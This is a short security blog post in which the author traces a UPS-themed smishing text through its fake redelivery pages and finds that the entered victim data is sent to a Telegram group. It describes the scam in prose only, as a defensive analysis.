Analysis of a Smishing Text

Introduction

This blog post is going to be a bit different than most of the content that I post here, but I think this may interest people because it is a relatable story. Basically anybody with a cell phone has received sketchy text messages about package delivery delays, credit card payments, etc., at some point. In short, I received a Smishing (Phishing over SMS) message recently and I dug into it to see what I could uncover. Smishing is defined by the Oxford Dictionary as “the fraudulent practice of sending text messages purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords or credit card numbers.” During my analysis of this smishing attempt, I learned a few interesting things and had some fun with it. This blog post will walk through the steps I took in my analysis and explain the findings along the way. Enjoy!

Analysis

Figure 1. Smishing message containing link to apparent LinkedIn content.

So this all started with a text message from a strange number. Taking just a quick glance at it, there were a few things that instantly raised my suspicions. 1) The strange number. I have seen cases where legitimate messages come from strange looking numbers like this one, but the majority of unsolicited messages coming from numbers like that one are malicious in my experience. 2) The message is referencing a package coming from UPS which can not be delivered and needs to be scheduled for redelivery, yet the link is apparently from LinkedIn. 3) Phishing and smishing attempts related to package deliveries are extremely common. In today’s era, almost everybody has a package or two en-route to them on nearly any given day. Hearing that one of the packages needs to be scheduled for redelivery introduces elements of relevance and urgency, since most people probably want their packages delivered as soon as possible. These three things made me 100% confident that this was a smishing attempt, but what’s the fun in stopping there?

I spun up my Kali Linux VM and started burpsuite so that I could intercept, view, and modify HTTP requests to the malicious site. Then I navigated to the link from the text message, and was immediately redirected to this fake UPS page asking for my zip code.

Figure 2. Note the strange URL.

From here, I looked up the IP address of this site on Virustotal and IPvoid, and both tools indicated that this IP address had been known to be associated with phishing and smishing for approximately 8 months before writing this post (November 2022). [1] The IP associated with this fake UPS website is part of a Fastly Content Delivery Network (CDN). Using CDN’s to mask true origin is a TTP commonly used in phishing and smishing campaigns. This also makes it slightly more difficult to block the websites associated with the campaign, as blocking an entire CDN IP would also block legitimate websites that are part of that CDN. So now the domain has to be blocked, but now the problem with this technique is the fact that moving the malicious content to a new domain name is fairly easy for an attacker. Such is the cat-and-mouse game of cybercrime and cybersecurity.

After entering a fake zip code, I was then brought to another page which indicated that my fictitious package was “On Hold”, and I had the option to schedule a redelivery.

Figure 3. Page indicating that a package is “On Hold”, and giving the victim the option to schedule a redelivery.

Once I clicked on the button to schedule a redelivery, I was taken to a page where I could enter information such as name, date of birth, street address, city, state, phone number, and email address.

Figure 4. Form for scheduling “redelivery”

After entering all of that information, I was taken to a page where I could enter credit card information to pay for the redelivery. I entered some fake information, and intercepted the HTTP GET request being made with the fake card information inside. This HTTP GET request was sending all of the information I had entered in the previous forms to the Telegram secure messaging platform API, which was then sending that information to a specific Telegram group where the cybercriminal(s) are sitting and waiting for victim information to flow in.

Figure 5. Victim information being sent to attacker-controlled Telegram group

Figure 6. Formatted victim information. This is how the information would appear to the cybercriminals in the Telegram group

Conclusion

I had fun with this and I hope you enjoyed reading this post, and maybe even learned something. Just like most people, I get similar phishing/smishing messages once in a while, but usually by the time I can analyze them, the associated infrastructure has been taken down. Luckily for me, that was not the case with this one, however I hope that not many people were victimized by this scam. If you enjoyed this post, please come back again! A follow and share would be super appreciated, and feedback is welcome as well.

References

[1] https://www.virustotal.com/gui/ip-address/199.36.158.100/community

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!